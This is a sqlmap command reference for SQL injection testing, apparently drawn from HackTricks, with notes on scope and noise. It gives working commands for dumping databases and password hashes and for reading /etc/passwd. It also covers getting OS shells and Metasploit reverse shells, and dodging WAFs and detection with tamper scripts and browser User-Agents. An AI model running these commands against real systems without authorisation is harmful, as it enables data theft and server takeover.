# SQLMap

By

Source: HackTricks SQLMap Guide


# 🔧 Basic Command Options

# Global options; combine them with any of the sections below.
-u "<URL>"                         # Target URL (include the query string carrying the parameter to test)
-p "<PARAM>"                       # Only test this parameter (default: every parameter sqlmap finds)
--user-agent="SQLMAP"             # Custom User-Agent; sqlmap's default UA names the tool and is commonly blocked or alerted on, so use a realistic browser string here
--random-agent                    # Pick a random real-browser User-Agent from sqlmap's built-in list instead
--threads=10                      # Parallel requests (10 is sqlmap's maximum); time-based blind retrieval is forced to a single thread regardless
--risk=3                          # Test aggressiveness 1-3; 3 adds OR-based payloads that can modify or delete rows if the injection lands in an UPDATE/DELETE -- only where data loss is acceptable
--level=5                         # Test breadth 1-5; >=2 also tests cookies, >=3 also User-Agent/Referer; 5 sends the full payload set and is slow and noisy
--dbms="<KNOWN DB TECH>"          # Skip fingerprinting and assume this backend (e.g. mysql, mssql, postgresql, oracle)
--os="<OS>"                       # Assume this server OS (Linux/Windows); only matters for the OS-takeover options
--technique="UB"                  # Limit to U=UNION and B=boolean-based blind; other letters: E=error, S=stacked, T=time-based blind, Q=inline
--batch                           # Never prompt; take the default answer to every question (review the log afterwards to see what it chose)
--auth-type="Basic"               # HTTP authentication scheme (Basic, Digest, NTLM, PKI)
--auth-cred="admin:admin"         # HTTP auth credentials; they end up in shell history and `ps` output, so clear history or use a throwaway account
--proxy="http://127.0.0.1:8080"   # Send every request through a proxy such as Burp, to inspect or replay exactly what sqlmap sends
--union-char="GsFRts2"            # Value used when detecting the UNION column count if the default integer is rejected (rare)

# 📥 Information Gathering

# Post-exploitation enumeration; run these once an injection point is confirmed.
--current-user        # DB account the application connects with
--is-dba              # Is that account a DBA/superuser? Decides what the file/OS options below can do
--hostname            # Hostname of the database server (may differ from the web host)
--users               # List DB accounts
--passwords           # Retrieve password hashes for those accounts (sqlmap offers a dictionary attack on them)
--privileges          # Show privileges per account (look for FILE, SUPER, sysadmin and similar before trying file/OS access)
--file-read=/etc/passwd  # Read a file as the DB server process; needs file-read rights on the DBMS (e.g. MySQL FILE privilege) and works on the DB host, not necessarily the web host

# 🧱 Database Enumeration

# Enumerate schema and data; scope each step with -D/-T/-C so you pull only what is needed.
--all                            # Retrieve everything sqlmap can (users, schema, data) -- very slow and noisy, rarely appropriate
--dump                           # Dump the entries of the selected table(s)
--dbs                            # List databases
--tables -D <DB>                 # List tables in a database
--columns -D <DB> -T <TABLE>     # List columns of a table
-D <DB> -T <TABLE> -C <COL> --dump   # Dump one column only (add --where / --start / --stop to limit rows)

# 📄 Request File (Burp)

Save the raw request from Burp (right-click → Copy to file) as request.txt, then run the command below. The file contains your session cookie and any auth headers, so keep it out of shared or versioned directories and delete it when done:

# Replays the saved raw request and tests every parameter, cookie and header it carries.
# The file has no URL scheme: add --force-ssl if it was captured over HTTPS (unless the Host is on :443).
# Narrow the scope with -p <param> or --skip=<param>.
sqlmap -r request.txt

# 🌐 Request Methods

# GET

# Test the named parameter; -p limits sqlmap to that parameter
sqlmap -u "http://example.com/?id=1" -p id
# The '*' marker fixes the injection point explicitly (-p is then redundant)
sqlmap -u "http://example.com/?id=*" -p id

# POST

# Body parameters go in --data; each '*' is an injection point (both fields are tested here)
sqlmap -u "http://example.com" --data "username=*&password=*"

# PUT

# Note: no body is supplied, so the only injection point is the Referer header;
# to inject in the PUT payload itself, add --data as in the POST example
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

# 🍪 Cookie Injection

# Inject into a cookie value. Cookies are only tested automatically at --level 2+;
# the '*' marker forces the injection point regardless of level.
# If the page needs a login, pass the valid session cookie here too, or sqlmap only sees the logged-out response.
sqlmap -u "http://example.com" --cookie="sessionid=*"

# 🧾 Custom Headers

# Inject into arbitrary headers. Headers such as Referer/User-Agent are only tested
# automatically at --level 3+; the '*' marker forces the point regardless.
# Here the payload is appended after a plausible value (127.0.0.1) so the header still parses
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

# 💣 Command Execution

# Run system command.
# OS access needs either stacked queries or a DBMS-specific path (MySQL: FILE privilege
# plus a writable web root for a staged shell; MSSQL: xp_cmdshell; PostgreSQL: a UDF)
# and high DB privileges -- check --is-dba / --privileges first. Every command is one
# more HTTP round trip against the target, so expect this to be slow and logged.
sqlmap -u "http://example.com/?id=1" -p id --os-cmd whoami

# Interactive shell (same prerequisites as --os-cmd)
sqlmap -u "http://example.com/?id=1" -p id --os-shell

# Auto-exploit with reverse shell: hands the session to Metasploit. Requires a local
# Metasploit install (see --msf-path) and the target being able to connect back to you;
# it is loud and rarely appropriate outside a lab or an engagement that explicitly allows it.
sqlmap -u "http://example.com/?id=1" -p id --os-pwn

# 🧙 Tamper Scripts

Path on Kali: /usr/share/sqlmap/tamper

# Tamper scripts rewrite each payload before it is sent, to get past a WAF or input filter
# (here `between` replaces the > operator with a NOT BETWEEN form and `randomcase` randomises
# keyword case). Stack several with commas. Confirm the injection without tampers first, then
# add only the scripts that match the filter you hit -- each adds requests and can break
# payloads that would otherwise have worked.
--tamper=between,randomcase

📚 Reference: run `sqlmap --list-tampers` for the built-in scripts with a one-line description of each, or read the sources in the tamper directory above.


# 📊 LDTR - Logical Flow

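# 1. Confirm the injection and list databases.
#    Keep the injectable parameter (?id=1) on every later step: sqlmap re-tests the
#    URL on each run, and a URL with no parameter gives it nothing to inject into.
sqlmap -u "http://target.com/?id=1" --dbs

# 2. List tables in the chosen database
sqlmap -u "http://target.com/?id=1" -D "<db_name>" --tables

# 3. List the columns of a table (read from information_schema, no guessing needed)
sqlmap -u "http://target.com/?id=1" -D "<db_name>" -T "<table>" --columns
#    Fallback when the DBMS exposes no information_schema (e.g. old MySQL, MS Access):
#    --common-columns brute-forces column names from a wordlist instead
sqlmap -u "http://target.com/?id=1" -D "<db_name>" -T "<table>" --common-columns

# 4. Dump the table (narrow with -C "<col>", --where, or --start/--stop so you pull only what the engagement needs)
sqlmap -u "http://target.com/?id=1" -D "<db_name>" -T "<table>" --dump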